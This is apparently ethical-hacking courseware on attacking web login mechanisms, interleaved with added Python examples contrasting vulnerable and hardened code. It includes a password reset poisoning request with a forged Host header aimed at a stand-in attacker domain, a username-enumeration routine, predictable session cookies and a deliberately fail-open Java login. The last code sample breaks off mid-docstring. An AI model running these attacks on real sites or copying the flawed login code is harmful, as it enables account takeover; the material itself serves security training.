Attack Authentication Mechanism

Exploit design and implementation flaws in web applications, such as failure to check password strength or insecure transmission of credentials, to bypass authentication mechanisms

Username Enumeration
■ Verbose failure messages
■ Predictable usernames

Password Attacks
■ Password functionality exploits
■ Password guessing
■ Brute-force attack
■ Dictionary attack
■ Attack password reset mechanism

Session Attacks
■ Session prediction
■ Session brute-forcing
■ Session poisoning

Cookie Exploitation
■ Cookie poisoning
■ Cookie sniffing
■ Cookie replay

Bypass Authentication
■ Bypass SAML-based SSO

Design and Implementation Flaws in Authentication Mechanism

■ Bad Passwords
■ User Impersonation
■ Brute-Forcible Login
■ Improper Validation of Credentials
■ Verbose Failure Messages
■ Predictable Usernames and Passwords
■ Insecure Transmission of Credentials
■ Insecure Distribution of Credentials
■ Password Reset Mechanism
■ Fail-Open Login Mechanism
■ Forgotten Password Mechanism
■ Flaws in Multistage Login Functionality
■ "Remember Me" Functionality
■ Insecure Storage of Credentials


Username Enumeration

If a login error states which part of the username and password is incorrect, guess the users of the application using the trial-and-error method

[Screenshot: WordPress.com login page (https://wordpress.com). Entering the username rini.matthews returns "User does not exist. Would you like to create a new account?", so the username is successfully enumerated]

Some applications automatically generate account usernames based on a sequence (i.e., user101, user102), and attackers can determine the sequence and enumerate valid usernames

Note: Username enumeration from verbose error messages will fail if the application implements an account lockout policy (i.e., locking the account after a certain number of failed login attempts)

Password Attacks: Password Functionality Exploits

Password Changing
■ Determine password change functionality within the application by spidering the application or creating a login account
■ Try random strings for 'Old Password', 'New Password', and 'Confirm the New Password' fields and analyze errors to identify vulnerabilities in password change functionality

Password Recovery
■ "Forgot Password" features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess the challenge answer successfully with the help of social engineering
■ Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved

'Remember Me' Exploit
■ "Remember Me" functions are implemented using a simple persistent cookie, such as RememberUser=jason or a persistent session identifier such as RememberUser=ABY112010
■ Attackers can use an enumerated username or predict the session identifier to bypass authentication mechanisms


Password Attacks: Password Guessing and Brute-forcing

Password Guessing
■ Create a list of possible passwords using common passwords, footprinting the target and using social engineering techniques, and try each password until the correct password is discovered
■ Create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks
■ Password guessing can be performed manually or by using automated tools such as THC-Hydra, Burp Suite, L0phtCrack, ophcrack, and RainbowCrack

Brute-forcing
■ Try to crack the log-in passwords by trying all possible values from a set of alphabets, numeric, and special characters
■ Use password cracking tools such as Burp Suite, L0phtCrack, and BruteX

[Screenshot: Burp Suite (https://portswigger.net)]

Password Attacks: Attack Password Reset Mechanism

Steps to perform password reset poisoning attack:

Step 1: Attacker obtains the email address used on the website by the target through techniques such as social engineering and OSINT

Step 2: Attacker sends a password reset request link to the victim using the altered Host header

■ For example:

POST https://certifiedhacker.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: badhost.com

■ The resultant URL for resetting the password is

https://badhost.com/reset-password.php?token=87654321-8765-8765-8765-10987654321

Step 3: The attacker then waits for the victim to receive the modified email

Step 4: Once the victim clicks on the malicious link embedded in the email, the attacker extracts the password reset token and performs various malicious activities
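Added example, not from the module: the reset-link builder that produces the poisoned URL above beside one that validates the Host header against an allowlist and builds the link from a configured origin. The raw request, token and allowlist are constructed from the slide's example values; the function and constant names are this example's own.

```python
"""Added example (not from the EC-Council module): a password reset link
built from the client-controlled Host header, and the hardened alternative.
The request, token, hosts and allowlist below are constructed."""
from urllib.parse import urlencode

# Origin the application is published under (the module's example host) and
# the only Host values the application should ever accept.
CANONICAL_ORIGIN = "https://certifiedhacker.com"
ALLOWED_HOSTS = {"certifiedhacker.com", "www.certifiedhacker.com"}
# Constructed token and request, modelled on the slide's example.
TOKEN = "87654321-8765-8765-8765-10987654321"
SAMPLE_REQUEST = (
    "POST https://certifiedhacker.com/reset.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/json\r\n"
    "Host: badhost.com\r\n"
    "\r\n"
)


class HostNotAllowed(ValueError):
    """Raised when the request names a host the application does not serve."""


def parse_headers(raw: str) -> dict:
    """Minimal header parser for a raw HTTP/1.1 request (request line skipped)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """Builds the emailed link from the client-controlled Host header, so an
    attacker-supplied Host: badhost.com ends up in the victim's inbox."""
    return f"https://{headers.get('Host', '')}/reset-password.php?token={token}"


def hardened_reset_link(headers: dict, token: str) -> str:
    """Checks Host (and any proxy-forwarded host) against the allowlist, then
    builds the link from the configured origin; the header value itself is
    never copied into the URL."""
    for name in ("Host", "X-Forwarded-Host"):
        if name in headers:
            host = headers[name].split(":", 1)[0].strip().lower()
            if host not in ALLOWED_HOSTS:
                raise HostNotAllowed(f"rejected {name} header {host!r}")
    return f"{CANONICAL_ORIGIN}/reset-password.php?{urlencode({'token': token})}"


def reset_link_or_none(headers: dict, token: str):
    """Convenience wrapper: the hardened link, or None when Host is rejected."""
    try:
        return hardened_reset_link(headers, token)
    except HostNotAllowed:
        return None


if __name__ == "__main__":
    hdrs = parse_headers(SAMPLE_REQUEST)
    print("vulnerable:", vulnerable_reset_link(hdrs, TOKEN))   # badhost.com link
    print("hardened:  ", reset_link_or_none(hdrs, TOKEN))      # None: rejected
    print("hardened:  ", reset_link_or_none({"Host": "certifiedhacker.com"}, TOKEN))
```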


Session Attacks: Session ID Prediction/Brute-forcing

■ In the first step, collect some valid session ID values by sniffing traffic from authenticated users
■ Analyze captured session IDs to determine elements of the session ID generation process such as the session ID structure, the information that is used to create it, and the encryption or hash algorithm used by the application to protect it
■ Vulnerable session generation mechanisms that use session IDs composed using predictable information such as username, timestamp, or client IP address can be exploited easily by guessing valid session IDs
■ In addition, you can implement a brute force technique to generate and test different session ID values until you successfully get access to the application

GET request:
GET http://janaina:8180/WebGoat/attack?Screen=17&menu=410 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Referer: http://janaina:8180/WebGoat/attack?Screen=17&menu=410
Cookie: JSESSIONID=user01    <-- Predictable Session Cookie
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

Cookie Exploitation: Cookie Poisoning

■ If the cookie contains passwords or session identifiers, steal the cookie using techniques such as script injection and eavesdropping
■ Then replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication
■ You can trap cookies using tools such as OWASP Zed Attack Proxy and Burp Suite

[Screenshot: OWASP Zed Attack Proxy showing an intercepted request and its Cookie header (https://www.zaproxy.org)]


Bypass Authentication: Bypass SAML-based SSO

■ Single Sign-on (SSO) authentication processes permit a user to sign into an application using a single set of credentials and use the same login session to access multiple applications irrespective of domains or platforms
■ The communication between these applications can be done through SAML messages
■ SAML messages are encrypted using Base64 encoding and can be easily decrypted to extract the content of messages
■ Attackers use tools such as SAML Raider to bypass SAML-based SSO authentication

[Screenshot: Burp Suite HTTP history showing a decoded SAML message (https://portswigger.net)]

Attack Authentication Mechanism


In general, web applications authenticate users through authentication mechanisms such as
login functionality. During web application analysis, attackers try to find authentication
vulnerabilities such as weak passwords (e.g., short or blank, common dictionary words or
names, user's names, defaults). Attackers exploit these vulnerabilities to gain access to the web
application by network eavesdropping, brute-force attacks, dictionary attacks, cookie replay
attacks, credential theft, etc.
Most authentication mechanisms used by web applications have design flaws. Attackers can
identify these flaws and exploit them to gain unauthorized access to the web application. Such
design flaws include failure to check password strength, insecure transmission of credentials
over the Internet, etc. Web applications usually authenticate their clients or users by a
combination of a username and password, which can be identified and exploited.
■ Username Enumeration

Attackers can enumerate usernames in two ways: verbose failure messages and
predictable usernames.

o Verbose Failure Message

In a typical login system, the user enters two fields, namely username and password.
In some cases, an application will ask for additional information. If the user is trying
to log in and fails, it implies that at least one field was incorrect. This provides
grounds for an attacker to exploit the application.
Examples:

• Account <username> not found


• Incorrect password provided


• Account <username> has been locked out
o Predictable Usernames

Some applications automatically generate account usernames according to some


predictable sequence. This makes it very easy for the attacker to discern the
sequence for a potentially exhaustive list of all valid usernames.
■ Password Attacks

A password attack is a process of trying various password cracking techniques to


discover a user account password by which the attacker can gain access to an
application.
Methods for cracking passwords include the following:
o Password functionality exploits
o Password guessing
o Brute-force attack
o Dictionary attack
o Attack password reset mechanism
■ Session Attacks

The following types of session attacks are employed by attackers against authentication
mechanisms:
o Session prediction: It focuses on predicting session ID values that allow the attacker
to bypass the authentication mechanism of an application. By analyzing and
understanding the session ID generation process, the attacker can predict a valid
session ID value and gain access to the application.
o Session brute-forcing: An attacker brute-forces the session ID of a target user and
uses it to log in as a legitimate user and gain access to the application.
o Session poisoning: It allows an attacker to inject malicious content, modify the
user's online experience, and obtain unauthorized information.
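Added example, not from the module: a first-pass analysis of captured session ID values for the predictability patterns described above (embedded usernames, timestamps or IP addresses, possibly behind base64 or hex encoding; sequential counters; low entropy), beside how a server should mint an ID. All IDs and usernames are constructed; the `user01` set mirrors the JSESSIONID shown in the slide, and the 64-bit threshold is this example's choice.

```python
"""Added example (not from the EC-Council module): scoring captured session
IDs for the predictability patterns the module describes, and minting
unpredictable ones. Every ID and username below is constructed."""
import base64
import math
import re
import secrets
import string

# Constructed data: usernames known on the target and two captured ID sets.
KNOWN_USERS = ["user01", "user02", "user03", "alice"]
PREDICTABLE_IDS = ["user01", "user02", "user03"]       # the slide's JSESSIONID pattern
ENCODED_IDS = [base64.b64encode(b"alice:1700000000:10.0.0.5").decode()]
TIMESTAMP = re.compile(r"(?<!\d)1[5-9]\d{8}(?!\d)")    # 10-digit epoch seconds
IPV4 = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")
MIN_BITS = 64                                          # this example's threshold


def decoded_views(sid: str) -> list:
    """The ID itself plus any printable base64 or hex decoding of it, so a
    username or timestamp hidden behind an encoding is still inspected."""
    views = [sid]
    try:
        raw = base64.b64decode(sid + "=" * (-len(sid) % 4), validate=True)
        if raw and all(32 <= b < 127 for b in raw):
            views.append(raw.decode("ascii"))
    except ValueError:          # binascii.Error is a ValueError subclass
        pass
    if len(sid) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", sid):
        raw = bytes.fromhex(sid)
        if raw and all(32 <= b < 127 for b in raw):
            views.append(raw.decode("ascii"))
    return views


def estimate_entropy_bits(sid: str) -> float:
    """Optimistic upper bound: length * log2(alphabet) for the character
    classes actually present. A real generator must clear MIN_BITS easily."""
    classes = [string.ascii_lowercase, string.ascii_uppercase, string.digits, "-_+/="]
    alphabet = sum(len(c) for c in classes if any(ch in c for ch in sid))
    return len(sid) * math.log2(alphabet) if alphabet else 0.0


def analyze_session_ids(sids: list) -> dict:
    """Flag the predictability patterns named in the module."""
    findings = set()
    for sid in sids:
        for view in decoded_views(sid):
            for user in KNOWN_USERS:
                if user in view:
                    findings.add(f"embeds username {user!r}")
            if TIMESTAMP.search(view):
                findings.add("embeds unix timestamp")
            if IPV4.search(view):
                findings.add("embeds IPv4 address")
        if estimate_entropy_bits(sid) < MIN_BITS:
            findings.add(f"below {MIN_BITS} bits of entropy")
    # Sequential counter: identical prefix and a numeric suffix that steps up.
    tails = [re.search(r"\d+$", s) for s in sids]
    if len(sids) > 1 and all(tails):
        prefixes = {s[:m.start()] for s, m in zip(sids, tails)}
        nums = [int(m.group()) for m in tails]
        if len(prefixes) == 1 and all(0 < b - a <= 10 for a, b in zip(nums, nums[1:])):
            findings.add("sequential numeric suffix")
    return {"predictable": bool(findings), "findings": sorted(findings)}


def mint_session_id() -> str:
    """What the server should issue instead: 256 bits from the OS CSPRNG,
    carrying no user, time or address information."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    for label, ids in [("captured", PREDICTABLE_IDS), ("encoded", ENCODED_IDS),
                       ("minted", [mint_session_id() for _ in range(3)])]:
        print(label, analyze_session_ids(ids))
```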
■ Cookie Exploitation
Cookie exploitation attacks are of the following types:
o Cookie poisoning: It is a type of parameter tampering attack in which the attacker
modifies the cookie contents to draw unauthorized information about a user and
thus perform identity theft.
o Cookie sniffing: It is a technique in which an attacker sniffs a cookie containing the
session ID of the victim who has logged in to a target website and uses the cookie to
bypass the authentication process and log in to the victim's account.


o Cookie replay: It is a technique used to impersonate a legitimate user by replaying
the cookie that contains the session ID of that user for as long as that session remains
valid. The attack stops working once the user logs out, provided the server actually
invalidates the session on logout rather than merely clearing the cookie in the browser.
■ Bypass Authentication
o Bypass SAML-based SSO: Attackers take advantage of signature misconfigurations,
session expiry timeouts, session replays, misdirected SAML messages, etc., to bypass
SAML-based SSO authentication.
Design Flaws in Authentication Mechanism
Authentication mechanisms are among the most heavily attacked components of a web
application, because they are the gatekeeper for every other control. Applications usually
validate a user via his/her login credentials; even a minor weakness in this authentication
process can have serious consequences, such as granting access to illegitimate users.
■ Bad Passwords: Many applications impose little or no control over the quality of the
passwords they accept. Users often come across applications that accept blank or very
short passwords, ordinary names, dictionary words, a password identical to the
username, or unchanged default values. Such passwords can be easily guessed by
attackers, allowing them to access the application resources.
■ Brute-Forcible Login: If the login feature lets an attacker submit an unlimited number
of guesses, the attacker can eventually recover valid credentials and enter the
application illegitimately. If the application permits numerous login attempts without
any restriction, such as locking the account or throttling requests after a certain
number of failures, attackers can keep trying different passwords until they find the
right one. Thus, even an unskilled attacker can log in by manually entering different
password combinations, and automated tools make the process far faster.
■ Verbose Failure Messages: Any login form of an application requests users to supply at
least two fields, namely username and password. A few applications may also ask for
additional parameters such as DOB, the answer to a security question, or an OTP, to
validate a user. If the login attempt is unsuccessful, the application indicates that the
information provided is not valid. When the application specifies which field is incorrect
or gives reasons for denying access, attackers can exploit that field by trying a large set
of candidate names or words to enumerate the valid values required to access the
application. The list of enumerated data can also be used later for social engineering.
■ Insecure Transmission of Credentials: If an application passes sensitive information
over a plain HTTP connection, it becomes susceptible to MITM attacks, through which
attackers can eavesdrop on and tamper with the data in transit. Even when HTTPS is
used, attackers can still obtain the credentials if the application handles them
insecurely, for example by passing them as query string parameters (where they end up
in browser history and in proxy and server logs) or by storing them in cookies.
■ Password Reset Mechanism: Most applications let users change their passwords, and
many require periodic changes to reduce the threat of compromised passwords.
Moreover, when users notice misuse of their credentials, they can change their
passwords immediately to prevent illegitimate use. Sometimes, this password change
feature can itself be exploited: vulnerabilities that were eliminated in the main login
function can reappear in the password change mechanism. Some of the flaws in the
password change mechanism are as follows:
o Generating a verbose error that specifies whether the username is valid
o Allowing unlimited guesses of the "Existing password" field without any lockout or
throttling
o Checking whether the "New Password" and "Confirm Password" fields match only after
validating the existing password, so that the order of the error messages tells the
attacker whether a guess of the existing password was correct
■ Forgotten Password Mechanism: As with the password change mechanism, methods
for recovering forgotten passwords often contain issues that are commonly ignored in the
main login function, such as username enumeration. Additionally, several design flaws
in the forgotten password mechanism often make it weaker than the login itself, so that
the overall authentication logic of an application can be attacked through it. Some of
the flaws in the forgotten password mechanism are as follows:
o Relying on a weak secondary challenge when a user forgets a password, such as a
security question whose answer can be researched or guessed
o Developers often ignore the chance of the application being brute-forced during
the password recovery process. If the application allows any number of attempts to
answer the challenge, it is highly likely that the password will be recovered by
guessing answers related to the user
■ "Remember Me" Functionality: Applications also provide the "Remember Me" function
for convenience, to avoid re-entry of the username and password when a user repeatedly
signs in to an application from his/her device. This mechanism is often vulnerable both to
an attacker with access to the local computer and to attackers on other machines.
"Remember Me" functions are implemented with persistent cookies. When such a cookie
is presented, the application trusts it because it was issued in an earlier session, and it
creates a new session without asking for the login credentials again. If the cookie simply
encodes the username or a predictable identifier, attackers can submit a list of common
or enumerated usernames to gain complete access to the application without being
validated.
■ User Impersonation: Some privileged users access applications using other users'
credentials to assist those users in performing their operations. For instance, if a
customer's Internet connection is broken, the customer contacts the service provider for
help, and the customer care executive logs in to the customer's account from his or her
own system and assists in resolving the service outage. If an application allows privileged
users to impersonate others, any flaw in the impersonation logic can lead to vertical
privilege escalation, through which an attacker can gain complete access to the
application.
■ Improper Validation of Credentials: Well-designed applications enforce proper
authentication rules, such as requiring passwords of a minimum length and honoring
case-sensitive (upper and lower case), numeric, and special characters. By contrast, a
poorly designed application's authentication mechanism not only ignores good security
practice but also defeats the user's attempt to choose a strong password.
For instance, some applications truncate the password and evaluate only the first few
characters; a few compare passwords case-insensitively, and others strip unusual
characters before checking. Attackers can tailor automated password guessing attacks
to such applications, pruning the candidate list and reducing the number of requests
required to compromise an account.
■ Predictable Usernames and Passwords: A few applications produce usernames
automatically based on a predictable sequence. Attackers exploit this characteristic of
an application to instantly acquire a list of valid usernames, through which they can
perform further attacks.
Sometimes, user accounts are created all at once or in batches, and all these users'
initial passwords are generated by the same procedure and distributed through the same
channel. Knowing how these passwords are generated can allow the attacker to guess the
passwords of other users. Such vulnerabilities are often found within an intranet
environment.
■ Insecure Distribution of Credentials: Many applications adopt a procedure in which the
login credentials are supplied via SMS, email, post, etc. In some cases, what is supplied
to users may include not only login credentials but also a URL containing an "activation
code" for changing the system-generated initial password. If such codes are generated
predictably, an attacker who registers several accounts can observe the codes issued to
them, deduce the pattern, and derive the activation codes sent to other newly enrolled or
yet-to-be-enrolled users.
Implementation Flaws in Authentication Mechanism
Sometimes, carefully designed application security mechanisms open gateways to attacks due
to mistakes in their implementation. These mistakes may lead to information leakage,
bypassing of login security, or the collapse of the entire security module. Implementation flaws
in authentication are particularly dangerous because they are hard to discover with routine
testing. Some of the implementation flaws in authentication mechanisms are as follows:
■ Fail-Open Login Mechanism: It is a logic defect with significant consequences in the
authentication process. In the example below, if a request omits the username or
password parameter, getParameter() returns null and db.getUser() throws an
exception (such as a NullPointerException). The empty catch block swallows the
exception, and execution falls through to the "valid user" path, so the request is
logged in without any credential having been checked. The resulting session may lack
a specific user identity and so may not be fully functional, but it can still give attackers
access to critical information or functionality.
Example (the original, deliberately fail-open code):
    public Response verifyLogin(Session mySession) {
        try {
            String username = mySession.getParameter("username");
            String password = mySession.getParameter("password");
            User thisUser = db.getUser(username, password);
            if (thisUser == null) {
                // invalid credentials
                mySession.setMessage("Login Failed.");
                return doLogin(mySession);
            }
        } catch (Exception e) {
            // exception swallowed: no return here, so execution falls through
            // to the success path below (fail-open)
        }
        // valid user
        mySession.setMessage("Login successful!");
        return doMainMenu(mySession);
    }
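The same defect and its fail-closed correction, as an added example in Python rather than the courseware's Java (this is not code from the courseware). The Session and Database classes and the USER_DB store are constructed stand-ins for the request object and the user store, not part of any real framework:

```python
from dataclasses import dataclass, field
from typing import Optional

# Constructed credential store (plaintext only to keep the demo short).
USER_DB = {"alice": "correct-horse"}


@dataclass
class Session:
    """Stand-in for the request/session object used by the Java snippet."""
    params: dict = field(default_factory=dict)
    message: str = ""

    def get_parameter(self, name: str) -> Optional[str]:
        # Like servlet getParameter(): None when the field is absent from the request
        return self.params.get(name)


class Database:
    """Stand-in for db.getUser(): raises when a credential is missing."""

    def get_user(self, username: Optional[str], password: Optional[str]) -> Optional[str]:
        if username is None or password is None:
            # Mirrors the NullPointerException the text describes
            raise ValueError("null credential")
        return username if USER_DB.get(username) == password else None


db = Database()


def verify_login_vulnerable(session: Session) -> str:
    """Port of the fail-open logic: the empty except swallows the exception and
    execution falls through to the success path. Returns the page to render."""
    try:
        username = session.get_parameter("username")
        password = session.get_parameter("password")
        if db.get_user(username, password) is None:
            session.message = "Login Failed."
            return "login"
    except Exception:
        pass  # swallowed: no return here, so the success path below is reached
    session.message = "Login successful!"
    return "main_menu"


def verify_login_fixed(session: Session) -> str:
    """Fail-closed version: the success path is reachable only after a positive
    match, and any exception is treated as a failed login."""
    try:
        user = db.get_user(session.get_parameter("username"),
                           session.get_parameter("password"))
    except Exception:
        user = None  # any error means "not authenticated"
    if user is None:
        session.message = "Login Failed."
        return "login"
    session.message = "Login successful!"
    return "main_menu"


if __name__ == "__main__":
    # A request that carries no password parameter at all:
    print(verify_login_vulnerable(Session({"username": "alice"})))  # main_menu (fail-open)
    print(verify_login_fixed(Session({"username": "alice"})))       # login
```

The test case to add to any login suite is the one the vulnerable version fails: a request with a missing or malformed parameter must end on the login page, never on the main menu.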

■ Flaws in Multistage Login Functionality: Multistage login functionality is an advanced
security mechanism built on top of the username-and-password login model. A typical
implementation has three stages: entry of the username and password, a challenge for
certain digits of a PIN or characters of a memorable word, and submission of a value
displayed by a physical token. The first stage validates the user's username (or another
identifying value), and the remaining stages carry out different validation checks. Such
implementations often contain logic defects, for example assuming that a user who
reaches a later stage must already have passed the earlier ones.
■ Insecure Storage of Credentials: Although an application may have no flaw in its login
logic, it can make itself vulnerable by storing login credentials insecurely. Some
applications store user credentials in a database in plaintext; others use weak or
reversible encryption, or fast unsalted hashes. If such a store is disclosed, attackers can
recover the passwords through brute-force and password cracking attacks. Credentials
should instead be stored as salted, deliberately slow hashes.
Username Enumeration
Source: https://wordpress.com
If a login error states which of the username or password is incorrect, that field can be guessed
using the trial-and-error method.
Consider the following example. An attacker tries to enumerate the username and password of
"Rini Matthews" on wordpress.com. In the first attempt, the attacker tries to log in as
"rini.matthews," which results in the login failure message "User does not exist."


[Figure: WordPress.com "Log in to your account" form with "rini.matthews" entered in the
"Email Address or Username" field; the form responds "User does not exist. Would you like to
create a new account?"]

Figure 14.65: Error message for username does not exist

In the second attempt, the attacker tries to log in as "rinimatthews," which results in a message
stating that the password entered for the username is incorrect, thus confirming that the
username "rinimatthews" exists.

[Figure: WordPress.com login form after entering the username "rinimatthews" and a
password; the form responds "Oops, that's not the right password. Please try again!"]

Figure 14.66: Error message for username successfully enumerated to rinimatthews

Note: An account lockout policy, whereby the account is automatically locked after a certain
number of failed login attempts, limits password guessing but does not by itself stop username
enumeration: a lockout message such as "Account <username> has been locked out" is itself a
verbose error that confirms the username exists.


Some applications automatically generate account usernames based on a sequence (e.g.,
"user101," "user102"). Therefore, attackers can perform username enumeration by
determining the appropriate sequence.
Attackers can also use tools such as massh-enum (https://github.com) to perform automated
user enumeration on the target web application.
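An added example (not from the courseware) of how the enumeration described above works and how a single generic error message defeats it. The two login handlers and the USERS store are constructed stand-ins for a target application; the verbose messages mirror the ones shown in the figures, and the sequential_usernames() helper builds the kind of candidate list a "user101, user102" scheme invites:

```python
from typing import Callable, Iterable, List, Tuple

# Constructed user store; only the usernames matter for enumeration.
USERS = {"rinimatthews": "S3cret!", "admin": "hunter2"}

Response = Tuple[int, str]


def login_verbose(username: str, password: str) -> Response:
    """Vulnerable handler: the failure text reveals whether the account exists."""
    if username not in USERS:
        return 401, "User does not exist. Would you like to create a new account?"
    if USERS[username] != password:
        return 401, "Oops, that's not the right password. Please try again!"
    return 200, "Login successful"


def login_generic(username: str, password: str) -> Response:
    """Hardened handler: one message for every failure, so a probe learns nothing
    about which field was wrong."""
    if USERS.get(username) != password:
        return 401, "Invalid username or password."
    return 200, "Login successful"


def sequential_usernames(prefix: str, start: int, count: int) -> List[str]:
    """Candidate list for applications that issue usernames like user101, user102, ..."""
    return [f"{prefix}{n}" for n in range(start, start + count)]


def enumerate_users(login: Callable[[str, str], Response],
                    candidates: Iterable[str],
                    probe_password: str = "ZzQq-not-a-real-password") -> List[str]:
    """Attacker-side check: a candidate is confirmed when the failure response it
    produces differs from the response for a username that certainly does not exist."""
    baseline = login("no-such-user-" + probe_password, probe_password)
    return [name for name in candidates if login(name, probe_password) != baseline]


if __name__ == "__main__":
    candidates = ["rini.matthews", "rinimatthews", "admin"] + sequential_usernames("user", 101, 3)
    print(enumerate_users(login_verbose, candidates))  # ['rinimatthews', 'admin']
    print(enumerate_users(login_generic, candidates))  # []
```

When testing a real application, compare the status code, response length, redirect target and response time as well as the message text: a handler that returns one message but takes measurably longer for valid usernames (because it only hashes the password when the account exists) still leaks.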
Password Attacks: Password Functionality Exploits
■ Password Changing: Determine the password change functionality within the
application by spidering the application or creating a login account. Try random strings
for the "Old Password", "New Password", and "Confirm the New Password" fields and
analyze errors to identify vulnerabilities in the password change functionality.
■ Password Recovery: "Forgot Password" features generally present a challenge to the
user; if the number of attempts is not limited, an attacker can guess the answer and
solve the challenge successfully with the help of social engineering. Applications may
also send a unique recovery URL or existing password to an email address specified by
the attacker if the challenge is solved .
■ 'Remember Me' Exploit: "Remember Me" functions are implemented using a simple
persistent cookie such as RememberUser=jason or a persistent session identifier such as
RememberUser=ABY112010. Attackers can use an enumerated username or predict the
session identifier to bypass authentication mechanisms.
Password Attacks: Password Guessing
As its name implies, password guessing is the process of guessing possible user keywords that
might constitute an account password until eventually arriving at the correct one. To guess
passwords, attackers use techniques such as password lists and password dictionaries.
■ Password List
The majority of keywords used for preparing the password list includes certain daily
usage words such as birth date, street name, nickname, anniversary date, phone
number, pin number, parent's or friend's name, and pet's name.
Create a list of possible passwords using the most commonly used passwords as well as
footprinting and social engineering techniques, and try each password until the correct
password is discovered.
■ Password Dictionary
A password dictionary is the compilation of word and number combinations that could
be passwords. This type of attack saves time compared to a brute force attack.
Create a dictionary of all possible passwords using tools such as Dictionary Maker to
perform dictionary attacks.
■ Tools
Password guessing against a live login can be performed manually or with automated tools
such as THC-Hydra and Burp Suite (Intruder). L0phtCrack, ophcrack, and RainbowCrack are
offline crackers: they recover passwords from captured password hashes rather than by
submitting guesses to the application.


o THC-Hydra
Source: https://www.thc.org
THC-Hydra is a network logon cracker that supports a large number of protocols, as well
as IPv6 and internationalized (RFC 4013) credentials. It comes with a GUI and supports
HTTP and SOCKS proxies. Supported services include Firebird, FTP, HTTP(S) forms, IMAP,
LDAP, MS-SQL, RDP, SMTP, SNMP, and Telnet; the HTTP form modules are the ones used
for guessing web application logins.

Figure 14.67: Screenshot of THC-Hydra

Password Attacks: Brute-forcing
Brute-forcing is another method used for cracking passwords: every possible value from a
chosen character set is tried in turn. Its cost grows exponentially with password length and
with the size of the character set, so a long password that mixes upper- and lower-case
letters, digits, and symbols could take years to exhaust, which is impractical.
Try to crack the password by trying all possible values from a set of alphabetical, numerical, and
special characters. Use tools such as Burp Suite (Intruder) to submit the candidates to the
login form.
Password Cracking Tools

Some brute-forcing tools for cracking passwords are described below.


• Burp Suite

Source: https://portswigger.net
Burp Suite is an integrated platform for performing security testing of web applications.
It has various tools that work together to support the entire testing process, from initial
mapping and analysis of an application's attack surface to finding and exploiting security
vulnerabilities.
Burp Suite built-in tools

o Intercepting proxy for inspecting and modifying traffic between your browser and
the target application
o Application-aware spider for crawling content and functionality
o Web application scanner for automating the detection of numerous types of
vulnerabilities


o Intruder tool for performing customized attacks to find and exploit unusual
vulnerabilities
o Repeater tool for manipulating and resending individual requests

o Sequencer tool for testing the randomness of session tokens

[Figure: Burp Suite Intruder, Positions tab, attack type Sniper. The base request is a
POST /CEH/wp-login.php to 10.10.1.22:8080 with Content-Type application/x-www-form-urlencoded;
the log, pwd, wp-submit, redirect_to, wordpress_test_cookie and testcookie parameters are
marked as payload positions (6 payload positions, length 675).]

Figure 14.68: Screenshot of Burp Suite

Some additional password cracking tools are as follows:


■ L0phtCrack (https://l0phtcrack.gitlab.io)
■ ophcrack (https://ophcrack.sourceforge.io)
■ RainbowCrack (https://project-rainbowcrack.com)
■ Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
■ Dictionary Maker (http://dictionarymaker.sourceforge.net)
Password Attacks: Attack Password Reset Mechanism
Insecure password management practices lead to critical security vulnerabilities. One such
vulnerability is password reset poisoning, in which the attacker abuses headers such as Host in
the HTTP request to control the link that the application places in its password reset email.
Resetting the password is a common function used when a user forgets his/her password. The
user receives a "forgot password" link via email containing a one-time token, and when the link
is clicked, the server responds with a password reset page.
For example, consider the following HTTP request in which the attacker supplies a forged Host
header:
GET https://certifiedhacker.com/[email protected] HTTP/1.1
Host: badhost.com
The application then builds the reset link from the request's Host header:
$resetPwdURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=87654321-8765-8765-8765-10987654321";
This URL is embedded in the password reset email and sent to the victim. Because the
developers assume $_SERVER['HTTP_HOST'] will always be certifiedhacker.com, they perform
no further validation of it.
The password reset poisoning attack involves the following steps:
■ Step 1: The attacker obtains the target's email address used on the website through
techniques such as social engineering and OSINT.
■ Step 2: The attacker submits a password reset request for the victim's account to the
application, with the Host header altered to a domain the attacker controls. For example,
POST https://certifiedhacker.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: badhost.com
The resultant URL for resetting the password is
https://badhost.com/reset-password.php?token=87654321-8765-8765-8765-10987654321
■ Step 3: Now, the attacker waits for the victim to receive the poisoned email.
■ Step 4: Once the victim clicks the malicious link, the victim's browser sends the password
reset token to the attacker's server. Using this token, the attacker can reset the victim's
password on the real site, serve a cloned copy of the application to steal the victim's
credentials, or act as a proxy that mimics the behavior and contents of the original website.
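The vulnerable link construction above and a hardened version, as an added Python example (not from the courseware; the PHP line on the page is the original). The request dictionaries, the token value and the certifiedhacker.com/badhost.com host names are constructed placeholders, and CANONICAL_HOST and ALLOWED_HOSTS are assumed deployment settings:

```python
from urllib.parse import urlencode

# Assumed deployment settings (not from the courseware).
CANONICAL_HOST = "certifiedhacker.com"
ALLOWED_HOSTS = {"certifiedhacker.com", "www.certifiedhacker.com"}
RESET_PATH = "/reset-password.php"


def reset_link_vulnerable(request: dict, token: str) -> str:
    """Mirrors the PHP above: the link's host is copied straight from the Host header,
    which the client controls ($_SERVER['HTTP_HOST'])."""
    host = request["headers"]["Host"]
    return f"https://{host}{RESET_PATH}?{urlencode({'token': token})}"


def reset_link_fixed(request: dict, token: str) -> str:
    """Never derive the link from request headers. Build it from the configured
    canonical host, and refuse the request outright when Host (or a reverse proxy's
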